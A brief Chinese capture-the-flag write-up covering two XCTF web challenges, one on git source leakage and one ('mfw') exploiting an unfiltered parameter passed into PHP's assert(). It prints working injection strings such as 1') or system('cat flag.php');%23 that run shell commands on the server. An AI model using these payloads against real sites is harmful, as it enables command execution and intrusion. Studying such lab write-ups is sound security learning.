题目来源

https://adworld.xctf.org.cn/task

WEB

进阶题

lottery

先注册一个账户1。

总的来说是一个猜数游戏，通过玩这个游戏来获取$从而购买flag，但是flag金额过高，肯定是无法用这样的方法“赚到”的，于是开始寻找可以利用的点。

查看robots.txt：

User-agent: *
Disallow: /.git/

可能存在git源码泄露。使用githack获取

进行代码审计

mfw

首先打开题目

在about界面发现：

访问/.git/发现存在git源码泄露于是使用githack搞到源码。

进行代码审计，在index.php中发现漏洞

page变量没有经过过滤就直接使用，导致我们可以构造恶意代码闭合assert函数进行任意命令执行。

构造

1') or phpinfo(); %23

成功执行phpinfo函数。

接着分别构造并查看注释内容得到flag

1') or system('ls');%23
1') or system('cd templates;ls');%23
1') or system('cd templates;cat flag.php');%23